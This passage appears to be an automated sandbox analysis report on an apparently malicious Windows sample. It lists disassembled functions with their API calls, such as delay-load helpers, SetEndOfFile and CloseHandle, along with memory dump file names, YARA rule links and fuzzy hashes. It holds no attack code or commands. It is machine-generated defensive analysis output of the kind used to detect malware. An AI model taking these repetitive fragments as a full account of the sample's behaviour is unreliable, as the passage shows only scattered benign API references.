                                                                                                                                                                                                    • Opcode Fuzzy Hash: 893db725910fb0be2bcdbc9b83207e2ea666f063e881980bd05261169eedad30
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    Function 0088E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 51b2896d3e804d060ce2318e32d3edda4d9db8c7447cac89fe574d3b31e9dca2
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b2896d3e804d060ce2318e32d3edda4d9db8c7447cac89fe574d3b31e9dca2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    Function 0088E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: b4cf7612271a4f5cd374137741ef7402329df51aca41f11ba0671b6313fa8b4e
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4cf7612271a4f5cd374137741ef7402329df51aca41f11ba0671b6313fa8b4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    Function 0088E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 816649ab4dae69b40978cc0590ec822a50e6714e964659f872c3a17ad406b299
                                                                                                                                                                                                    • Instruction ID: 6bfce62b643e8093a710bcb31d88eb5d3af8c821d81e0031e606f2ebb5bd198a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 816649ab4dae69b40978cc0590ec822a50e6714e964659f872c3a17ad406b299
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A011E22A800ABC3008B2002C02C3B020CE8C2B20330882EF822E0A80A8880C000A33
                                                                                                                                                                                                    Function 0088E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 4697c418a94d1856d06abf5ccec05a6363ff1c783793ce473a35e30e5dc571c6
                                                                                                                                                                                                    • Instruction ID: 08b5f1efa843198f4cd78ab2422e7112e126fdae293d06d21c0a1a1a47f4f3b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4697c418a94d1856d06abf5ccec05a6363ff1c783793ce473a35e30e5dc571c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17A011C22A800ABC3008B2A22C02C3B020CE0C2B28330882EF822C0880B88008000A32
                                                                                                                                                                                                    Function 0088E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fc1d69bf7da90eec6d6afbae37d1a10af1a575454ab6438050f983e1d17965c2
                                                                                                                                                                                                    • Instruction ID: 08b5f1efa843198f4cd78ab2422e7112e126fdae293d06d21c0a1a1a47f4f3b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1d69bf7da90eec6d6afbae37d1a10af1a575454ab6438050f983e1d17965c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17A011C22A800ABC3008B2A22C02C3B020CE0C2B28330882EF822C0880B88008000A32
                                                                                                                                                                                                    Function 0088E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 695b4d358fff0dcfcdebb64ebedcce698e9d6b6ee5d7944b84d24e7056c387f6
                                                                                                                                                                                                    • Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 695b4d358fff0dcfcdebb64ebedcce698e9d6b6ee5d7944b84d24e7056c387f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
                                                                                                                                                                                                    Function 0088E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: cd7af1c07843dd5d021b8357e428a80251ce82dd57e1567bd1586a112f0c3f40
                                                                                                                                                                                                    • Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd7af1c07843dd5d021b8357e428a80251ce82dd57e1567bd1586a112f0c3f40
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
                                                                                                                                                                                                    Function 0088E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: f675508366261f7848b136dda8ee3500d24efa8c22ca95513995af84f9516d92
                                                                                                                                                                                                    • Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f675508366261f7848b136dda8ee3500d24efa8c22ca95513995af84f9516d92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
                                                                                                                                                                                                    Function 0088E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 328bd15253375a79b5be8f5b58a9cb0bbdaffe401afb902de41bc4d3c9747d9e
                                                                                                                                                                                                    • Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 328bd15253375a79b5be8f5b58a9cb0bbdaffe401afb902de41bc4d3c9747d9e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
                                                                                                                                                                                                    Function 0088E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: d2935c6b254e91be69ad76af480a3f1a65b73fd68d6d87307048b818813fc9bf
                                                                                                                                                                                                    • Instruction ID: 7272915de2681645c46693dd9ee1209591b06d1e1c676bc7621918f54e59f3ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2935c6b254e91be69ad76af480a3f1a65b73fd68d6d87307048b818813fc9bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDA011C22A80083C3008B2A22C02C3B020CE0E2B2A330822EF820C0880B88008000A32
                                                                                                                                                                                                    Function 00879F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(?,0087903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00879F0C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                                                                                    • Opcode ID: efa1160ae57f2d86a65bd12167e44a43e0a6f5b4c4767d1b34b6076369628c48
                                                                                                                                                                                                    • Instruction ID: 06aedd556372d9fff6b186160066bf26b1d8bcbcf39e0b2d4d0e7157901f3f07
                                                                                                                                                                                                    • Opcode Fuzzy Hash: efa1160ae57f2d86a65bd12167e44a43e0a6f5b4c4767d1b34b6076369628c48
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8A0243004040D47DD001730CD0400C7710F7117C030051D47007CF471C7134407C700
                                                                                                                                                                                                    Function 0088AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0088AE72,C:\Users\user\Desktop,00000000,008B946A,00000006), ref: 0088AC08
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1611563598-0
                                                                                                                                                                                                    • Opcode ID: d7ca231b6534acbaad32e7679b29081b36010aa4c5cd7f6288b31a9b6600b2a4
                                                                                                                                                                                                    • Instruction ID: 4f33071a97c365bcded9bab8e976fbec94e6a5449287108301bc07b3ffaf4e00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7ca231b6534acbaad32e7679b29081b36010aa4c5cd7f6288b31a9b6600b2a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFA011302002008BA2000B328F0AA0EBAAABFA2B00F00C028B00080030CB30C820BA00
                                                                                                                                                                                                    Function 00879620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,008795D6,?,?,?,?,?,008A2641,000000FF), ref: 0087963B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
